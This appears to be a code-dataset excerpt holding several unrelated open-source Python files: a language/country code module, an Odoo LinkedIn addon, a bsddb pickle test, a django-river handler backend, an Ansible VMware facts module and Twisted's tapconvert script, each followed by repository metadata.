('tsn', '', 'tn', u'Tswana', u'tswana'),
('tso', '', 'ts', u'Tsonga', u'tsonga'),
('tuk', '', 'tk', u'Turkmen', u'turkmène'),
('tum', '', '', u'Tumbuka', u'tumbuka'),
('tup', '', '', u'Tupi languages', u'tupi, langues'),
('tur', '', 'tr', u'Turkish', u'turc'),
('tut', '', '', u'Altaic languages', u'altaïques, langues'),
('tvl', '', '', u'Tuvalu', u'tuvalu'),
('twi', '', 'tw', u'Twi', u'twi'),
('tyv', '', '', u'Tuvinian', u'touva'),
('udm', '', '', u'Udmurt', u'oudmourte'),
('uga', '', '', u'Ugaritic', u'ougaritique'),
('uig', '', 'ug', u'Uighur; Uyghur', u'ouïgour'),
('ukr', '', 'uk', u'Ukrainian', u'ukrainien'),
('umb', '', '', u'Umbundu', u'umbundu'),
('und', '', '', u'Undetermined', u'indéterminée'),
('urd', '', 'ur', u'Urdu', u'ourdou'),
('uzb', '', 'uz', u'Uzbek', u'ouszbek'),
('vai', '', '', u'Vai', u'vaï'),
('ven', '', 've', u'Venda', u'venda'),
('vie', '', 'vi', u'Vietnamese', u'vietnamien'),
('vol', '', 'vo', u'Volapük', u'volapük'),
('vot', '', '', u'Votic', u'vote'),
('wak', '', '', u'Wakashan languages', u'wakashanes, langues'),
('wal', '', '', u'Walamo', u'walamo'),
('war', '', '', u'Waray', u'waray'),
('was', '', '', u'Washo', u'washo'),
('wel', 'cym', 'cy', u'Welsh', u'gallois'),
('wen', '', '', u'Sorbian languages', u'sorabes, langues'),
('wln', '', 'wa', u'Walloon', u'wallon'),
('wol', '', 'wo', u'Wolof', u'wolof'),
('xal', '', '', u'Kalmyk; Oirat', u'kalmouk; oïrat'),
('xho', '', 'xh', u'Xhosa', u'xhosa'),
('yao', '', '', u'Yao', u'yao'),
('yap', '', '', u'Yapese', u'yapois'),
('yid', '', 'yi', u'Yiddish', u'yiddish'),
('yor', '', 'yo', u'Yoruba', u'yoruba'),
('ypk', '', '', u'Yupik languages', u'yupik, langues'),
('zap', '', '', u'Zapotec', u'zapotèque'),
('zbl', '', '', u'Blissymbols; Blissymbolics; Bliss', u'symboles Bliss; Bliss'),
('zen', '', '', u'Zenaga', u'zenaga'),
('zha', '', 'za', u'Zhuang; Chuang', u'zhuang; chuang'),
('znd', '', '', u'Zande languages', u'zandé, langues'),
('zul', '', 'zu', u'Zulu', u'zoulou'),
('zun', '', '', u'Zuni', u'zuni'),
('zza', '', '', u'Zaza; Dimili; Dimli; Kirdki; Kirmanjki; Zazaki', u'zaza; dimili; dimli; kirdki; kirmanjki; zazaki')]
class Country(object):
"""Country according to ISO-3166
:param string country: country name, alpha2 code, alpha3 code or numeric code
:param list countries: all countries
:type countries: see :data:`~subliminal.language.COUNTRIES`
"""
def __init__(self, country, countries=None):
countries = countries or COUNTRIES
country = to_unicode(country.strip().lower())
country_tuple = None
# Try to find the country
if len(country) == 2:
country_tuple = dict((c[0].lower(), c) for c in countries).get(country)
elif len(country) == 3 and not country.isdigit():
country_tuple = dict((c[1].lower(), c) for c in countries).get(country)
elif len(country) == 3 and country.isdigit():
country_tuple = dict((c[2].lower(), c) for c in countries).get(country)
if country_tuple is None:
country_tuple = dict((c[3].lower(), c) for c in countries).get(country)
# Raise ValueError if nothing is found
if country_tuple is None:
raise ValueError('Country %s does not exist' % country)
# Set default attrs
self.alpha2 = country_tuple[0]
self.alpha3 = country_tuple[1]
self.numeric = country_tuple[2]
self.name = country_tuple[3]
def __hash__(self):
return hash(self.alpha3)
def __eq__(self, other):
if isinstance(other, Country):
return self.alpha3 == other.alpha3
return False
def __ne__(self, other):
return not self == other
def __unicode__(self):
return self.name
def __str__(self):
return unicode(self).encode('utf-8')
def __repr__(self):
return 'Country(%s)' % self
class Language(object):
"""Language according to ISO-639
:param string language: language name (english or french), alpha2 code, alpha3 code, terminologic code or numeric code, eventually with a country
:param country: country of the language
:type country: :class:`Country` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param countries: all countries
:type countries: see :data:`~subliminal.language.COUNTRIES`
:param bool strict: whether to raise a ValueError on unknown language or not
:class:`Language` implements the inclusion test, with the ``in`` keyword::
>>> Language('pt-BR') in Language('pt') # Portuguese (Brazil) is included in Portuguese
True
>>> Language('pt') in Language('pt-BR') # Portuguese is not included in Portuguese (Brazil)
False
"""
with_country_regexps = [re.compile('(.*)\((.*)\)'), re.compile('(.*)[-_](.*)')]
def __init__(self, language, country=None, languages=None, countries=None, strict=True):
languages = languages or LANGUAGES
countries = countries or COUNTRIES
# Get the country
self.country = None
if isinstance(country, Country):
self.country = country
elif isinstance(country, basestring):
try:
self.country = Country(country, countries)
except ValueError:
logger.warning(u'Country %s could not be identified' % country)
if strict:
raise
# Language + Country format
#TODO: Improve this part
if country is None:
for regexp in [r.match(language) for r in self.with_country_regexps]:
if regexp:
language = regexp.group(1)
try:
self.country = Country(regexp.group(2), countries)
except ValueError:
logger.warning(u'Country %s could not be identified' % country)
if strict:
raise
break
# Try to find the language
language = to_unicode(language.strip().lower())
language_tuple = None
if len(language) == 2:
language_tuple = dict((l[2].lower(), l) for l in languages).get(language)
elif len(language) == 3:
language_tuple = dict((l[0].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[1].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[3].split('; ')[0].lower(), l) for l in languages).get(language)
if language_tuple is None:
language_tuple = dict((l[4].split('; ')[0].lower(), l) for l in languages).get(language)
# Raise ValueError if strict or continue with Undetermined
if language_tuple is None:
if strict:
raise ValueError('Language %s does not exist' % language)
language_tuple = dict((l[0].lower(), l) for l in languages).get('und')
# Set attributes
self.alpha2 = language_tuple[2]
self.alpha3 = language_tuple[0]
self.terminologic = language_tuple[1]
self.name = language_tuple[3]
self.french_name = language_tuple[4]
def __hash__(self):
if self.country is None:
return hash(self.alpha3)
return hash(self.alpha3 + self.country.alpha3)
def __eq__(self, other):
if isinstance(other, Language):
return self.alpha3 == other.alpha3 and self.country == other.country
return False
def __contains__(self, item):
if isinstance(item, Language):
if self == item:
return True
if self.country is None:
return self.alpha3 == item.alpha3
return False
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return self.alpha3 != 'und'
def __unicode__(self):
if self.country is None:
return self.name
return '%s (%s)' % (self.name, self.country)
def __str__(self):
return unicode(self).encode('utf-8')
def __repr__(self):
if self.country is None:
return 'Language(%s)' % self.name.encode('utf-8')
return 'Language(%s, country=%s)' % (self.name.encode('utf-8'), self.country)
class language_set(set):
"""Set of :class:`Language` with some specificities.
:param iterable: where to take elements from
:type iterable: iterable of :class:`Languages <Language>` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param bool strict: whether to raise a ValueError on invalid language or not
The following redefinitions are meant to reflect the inclusion logic in :class:`Language`
* Inclusion test, with the ``in`` keyword
* Intersection
* Substraction
Here is an illustration of the previous points::
>>> Language('en') in language_set(['en-US', 'en-CA'])
False
>>> Language('en-US') in language_set(['en', 'fr'])
True
>>> language_set(['en']) & language_set(['en-US', 'en-CA'])
language_set([Language(English, country=Canada), Language(English, country=United States)])
>>> language_set(['en-US', 'en-CA', 'fr']) - language_set(['en'])
language_set([Language(French)])
"""
def __init__(self, iterable=None, languages=None, strict=True):
iterable = iterable or []
languages = languages or LANGUAGES
items = []
for i in iterable:
if isinstance(i, Language):
items.append(i)
continue
if isinstance(i, tuple):
items.append(Language(i[0], languages=languages, strict=strict))
continue
items.append(Language(i, languages=languages, strict=strict))
super(language_set, self).__init__(items)
def __contains__(self, item):
for i in self:
if item in i:
return True
return super(language_set, self).__contains__(item)
def __and__(self, other):
results = language_set()
for i in self:
for j in other:
if i in j:
results.add(i)
for i in other:
for j in self:
if i in j:
results.add(i)
return results
def __sub__(self, other):
results = language_set()
for i in self:
if i not in other:
results.add(i)
return results
class language_list(list):
"""List of :class:`Language` with some specificities.
:param iterable: where to take elements from
:type iterable: iterable of :class:`Languages <Language>` or string
:param languages: all languages
:type languages: see :data:`~subliminal.language.LANGUAGES`
:param bool strict: whether to raise a ValueError on invalid language or not
The following redefinitions are meant to reflect the inclusion logic in :class:`Language`
* Inclusion test, with the ``in`` keyword
* Index
Here is an illustration of the previous points::
>>> Language('en') in language_list(['en-US', 'en-CA'])
False
>>> Language('en-US') in language_list(['en', 'fr-BE'])
True
>>> language_list(['en', 'fr-BE']).index(Language('en-US'))
0
"""
def __init__(self, iterable=None, languages=None, strict=True):
iterable = iterable or []
languages = languages or LANGUAGES
items = []
for i in iterable:
if isinstance(i, Language):
items.append(i)
continue
if isinstance(i, tuple):
items.append(Language(i[0], languages=languages, strict=strict))
continue
items.append(Language(i, languages=languages, strict=strict))
super(language_list, self).__init__(items)
def __contains__(self, item):
for i in self:
if item in i:
return True
return super(language_list, self).__contains__(item)
def index(self, x, strict=False):
if not strict:
for i in range(len(self)):
if x in self[i]:
return i
return super(language_list, self).index(x)
| gpl-3.0 | 5,969,076,717,839,732,000 | 51.110687 | 184 | 0.444847 | false |
dkodnik/arp | addons/web_linkedin/web_linkedin.py | 2 | 4484 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import urllib2
from urlparse import urlparse, urlunparse
import openerp
import openerp.addons.web
from openerp.osv import fields, osv
class Binary(openerp.http.Controller):
@openerp.http.route('/web_linkedin/binary/url2binary', type='json', auth='user')
def url2binary(self, url):
"""Used exclusively to load images from LinkedIn profiles, must not be used for anything else."""
_scheme, _netloc, path, params, query, fragment = urlparse(url)
# media.linkedin.com is the master domain for LinkedIn media (replicated to CDNs),
# so forcing it should always work and prevents abusing this method to load arbitrary URLs
url = urlunparse(('http', 'media.licdn.com', path, params, query, fragment))
bfile = urllib2.urlopen(url)
return base64.b64encode(bfile.read())
class web_linkedin_settings(osv.osv_memory):
_inherit = 'sale.config.settings'
_columns = {
'api_key': fields.char(string="API Key", size=50),
'server_domain': fields.char(size=100),
}
def get_default_linkedin(self, cr, uid, fields, context=None):
key = self.pool.get("ir.config_parameter").get_param(cr, uid, "web.linkedin.apikey") or ""
dom = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
return {'api_key': key, 'server_domain': dom,}
def set_linkedin(self, cr, uid, ids, context=None):
key = self.browse(cr, uid, ids[0], context)["api_key"] or ""
self.pool.get("ir.config_parameter").set_param(cr, uid, "web.linkedin.apikey", key)
class web_linkedin_fields(osv.Model):
_inherit = 'res.partner'
def _get_url(self, cr, uid, ids, name, arg, context=None):
res = dict((id, False) for id in ids)
for partner in self.browse(cr, uid, ids, context=context):
res[partner.id] = partner.linkedin_url
return res
def linkedin_check_similar_partner(self, cr, uid, linkedin_datas, context=None):
res = []
res_partner = self.pool.get('res.partner')
for linkedin_data in linkedin_datas:
partner_ids = res_partner.search(cr, uid, ["|", ("linkedin_id", "=", linkedin_data['id']),
"&", ("linkedin_id", "=", False),
"|", ("name", "ilike", linkedin_data['firstName'] + "%" + linkedin_data['lastName']), ("name", "ilike", linkedin_data['lastName'] + "%" + linkedin_data['firstName'])], context=context)
if partner_ids:
partner = res_partner.read(cr, uid, partner_ids[0], ["image", "mobile", "phone", "parent_id", "name", "email", "function", "linkedin_id"], context=context)
if partner['linkedin_id'] and partner['linkedin_id'] != linkedin_data['id']:
partner.pop('id')
if partner['parent_id']:
partner['parent_id'] = partner['parent_id'][0]
for key, val in partner.items():
if not val:
partner.pop(key)
res.append(partner)
else:
res.append({})
return res
_columns = {
'linkedin_id': fields.char(string="LinkedIn ID", size=50),
'linkedin_url': fields.char(string="LinkedIn url", size=100, store=True),
'linkedin_public_url': fields.function(_get_url, type='text', string="LinkedIn url",
help="This url is set automatically when you join the partner with a LinkedIn account."),
}
| agpl-3.0 | -8,493,009,703,946,995,000 | 47.73913 | 204 | 0.600803 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-2.5/Lib/bsddb/test/test_pickle.py | 11 | 2172 |
import sys, os, string
import pickle
try:
import cPickle
except ImportError:
cPickle = None
import unittest
import glob
try:
# For Pythons w/distutils pybsddb
from bsddb3 import db
except ImportError, e:
# For Python 2.3
from bsddb import db
#----------------------------------------------------------------------
class pickleTestCase(unittest.TestCase):
"""Verify that DBError can be pickled and unpickled"""
db_home = 'db_home'
db_name = 'test-dbobj.db'
def setUp(self):
homeDir = os.path.join(os.path.dirname(sys.argv[0]), 'db_home')
self.homeDir = homeDir
try: os.mkdir(homeDir)
except os.error: pass
def tearDown(self):
if hasattr(self, 'db'):
del self.db
if hasattr(self, 'env'):
del self.env
files = glob.glob(os.path.join(self.homeDir, '*'))
for file in files:
os.remove(file)
def _base_test_pickle_DBError(self, pickle):
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_CREATE | db.DB_INIT_MPOOL)
self.db = db.DB(self.env)
self.db.open(self.db_name, db.DB_HASH, db.DB_CREATE)
self.db.put('spam', 'eggs')
assert self.db['spam'] == 'eggs'
try:
self.db.put('spam', 'ham', flags=db.DB_NOOVERWRITE)
except db.DBError, egg:
pickledEgg = pickle.dumps(egg)
#print repr(pickledEgg)
rottenEgg = pickle.loads(pickledEgg)
if rottenEgg.args != egg.args or type(rottenEgg) != type(egg):
raise Exception, (rottenEgg, '!=', egg)
else:
raise Exception, "where's my DBError exception?!?"
self.db.close()
self.env.close()
def test01_pickle_DBError(self):
self._base_test_pickle_DBError(pickle=pickle)
if cPickle:
def test02_cPickle_DBError(self):
self._base_test_pickle_DBError(pickle=cPickle)
#----------------------------------------------------------------------
def test_suite():
return unittest.makeSuite(pickleTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| mit | 7,992,853,783,927,926,000 | 27.96 | 74 | 0.555709 | false |
mstzn36/django-river | river/handlers/backends/memory.py | 2 | 1275 | import logging
from river.handlers.backends.base import BaseHandlerBackend, powerset
__author__ = 'ahmetdal'
LOGGER = logging.getLogger(__name__)
class MemoryHandlerBackend(BaseHandlerBackend):
def __init__(self):
self.handlers = {}
def register(self, handler_cls, handler, workflow_object, field, override=False, *args, **kwargs):
hash = self.get_handler_class_prefix(handler_cls) + handler_cls.get_hash(workflow_object, field, *args, **kwargs)
if override or hash not in self.handlers:
self.handlers[hash] = handler
LOGGER.debug("Handler '%s' is registered in memory as method '%s' and module '%s'. " % (hash, handler.__name__, handler.__module__))
return hash
def get_handlers(self, handler_cls, workflow_object, field, *args, **kwargs):
handlers = []
for c in powerset(kwargs.keys()):
skwargs = {}
for f in c:
skwargs[f] = kwargs.get(f)
hash = self.get_handler_class(handler_cls).get_hash(workflow_object, field, **skwargs)
handler = self.handlers.get(self.get_handler_class_prefix(self.get_handler_class(handler_cls)) + hash)
if handler:
handlers.append(handler)
return handlers
| gpl-3.0 | -4,589,561,749,836,278,300 | 41.5 | 145 | 0.62902 | false |
kustodian/ansible | lib/ansible/modules/cloud/vmware/_vmware_host_feature_facts.py | 21 | 4460 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_host_feature_facts
deprecated:
removed_in: '2.13'
why: Deprecated in favour of C(_info) module.
alternative: Use M(vmware_host_feature_info) instead.
short_description: Gathers facts about an ESXi host's feature capability information
description:
- This module can be used to gather facts about an ESXi host's feature capability information when ESXi hostname or Cluster name is given.
version_added: 2.8
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
options:
cluster_name:
description:
- Name of the cluster from all host systems to be used for facts gathering.
- If C(esxi_hostname) is not given, this parameter is required.
type: str
esxi_hostname:
description:
- ESXi hostname to gather facts from.
- If C(cluster_name) is not given, this parameter is required.
type: str
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather feature capability facts about all ESXi Hosts in given Cluster
vmware_host_feature_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: cluster_name
delegate_to: localhost
register: all_cluster_hosts_facts
- name: Check if ESXi is vulnerable for Speculative Store Bypass Disable (SSBD) vulnerability
vmware_host_feature_facts:
hostname: "{{ vcenter_server }}"
username: "{{ vcenter_user }}"
password: "{{ vcenter_pass }}"
validate_certs: no
esxi_hostname: "{{ esxi_hostname }}"
register: features_set
- set_fact:
ssbd : "{{ item.value }}"
loop: "{{ features_set.host_feature_facts[esxi_hostname] |json_query(name) }}"
vars:
name: "[?key=='cpuid.SSBD']"
- assert:
that:
- ssbd|int == 1
when: ssbd is defined
'''
RETURN = r'''
hosts_feature_facts:
description: metadata about host's feature capability information
returned: always
type: dict
sample: {
"10.76.33.226": [
{
"feature_name": "cpuid.3DNOW",
"key": "cpuid.3DNOW",
"value": "0"
},
{
"feature_name": "cpuid.3DNOWPLUS",
"key": "cpuid.3DNOWPLUS",
"value": "0"
},
]
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi
class FeatureCapabilityFactsManager(PyVmomi):
def __init__(self, module):
super(FeatureCapabilityFactsManager, self).__init__(module)
cluster_name = self.params.get('cluster_name', None)
esxi_host_name = self.params.get('esxi_hostname', None)
self.hosts = self.get_all_host_objs(cluster_name=cluster_name, esxi_host_name=esxi_host_name)
def gather_host_feature_facts(self):
host_feature_facts = dict()
for host in self.hosts:
host_feature_capabilities = host.config.featureCapability
capability = []
for fc in host_feature_capabilities:
temp_dict = {
'key': fc.key,
'feature_name': fc.featureName,
'value': fc.value,
}
capability.append(temp_dict)
host_feature_facts[host.name] = capability
return host_feature_facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
cluster_name=dict(type='str', required=False),
esxi_hostname=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'esxi_hostname'],
],
supports_check_mode=True,
)
host_capability_manager = FeatureCapabilityFactsManager(module)
module.exit_json(changed=False,
hosts_feature_facts=host_capability_manager.gather_host_feature_facts())
if __name__ == "__main__":
main()
| gpl-3.0 | 2,509,361,652,908,296,000 | 29.340136 | 138 | 0.630269 | false |
hlzz/dotfiles | graphics/VTK-7.0.0/ThirdParty/Twisted/twisted/scripts/tapconvert.py | 2 | 2202 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import sys, getpass
from twisted.python import usage
from twisted.application import app
from twisted.persisted import sob
class ConvertOptions(usage.Options):
synopsis = "Usage: tapconvert [options]"
optParameters = [
['in', 'i', None, "The filename of the tap to read from"],
['out', 'o', None, "A filename to write the tap to"],
['typein', 'f', 'guess',
"The format to use; this can be 'guess', 'python', "
"'pickle', 'xml', or 'source'."],
['typeout', 't', 'source',
"The output format to use; this can be 'pickle', 'xml', or 'source'."],
]
optFlags = [
['decrypt', 'd', "The specified tap/aos/xml file is encrypted."],
['encrypt', 'e', "Encrypt file before writing"]
]
compData = usage.Completions(
optActions={"typein": usage.CompleteList(["guess", "python", "pickle",
"xml", "source"]),
"typeout": usage.CompleteList(["pickle", "xml", "source"]),
"in": usage.CompleteFiles(descr="tap file to read from"),
"out": usage.CompleteFiles(descr="tap file to write to"),
}
)
def postOptions(self):
if self['in'] is None:
raise usage.UsageError("%s\nYou must specify the input filename."
% self)
if self["typein"] == "guess":
try:
self["typein"] = sob.guessType(self["in"])
except KeyError:
raise usage.UsageError("Could not guess type for '%s'" %
self["typein"])
def run():
options = ConvertOptions()
try:
options.parseOptions(sys.argv[1:])
except usage.UsageError, e:
print e
else:
app.convertStyle(options["in"], options["typein"],
options.opts['decrypt'] or getpass.getpass('Passphrase: '),
options["out"], options['typeout'], options["encrypt"])
| bsd-3-clause | -3,698,512,672,166,080,000 | 36.631579 | 80 | 0.509991 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.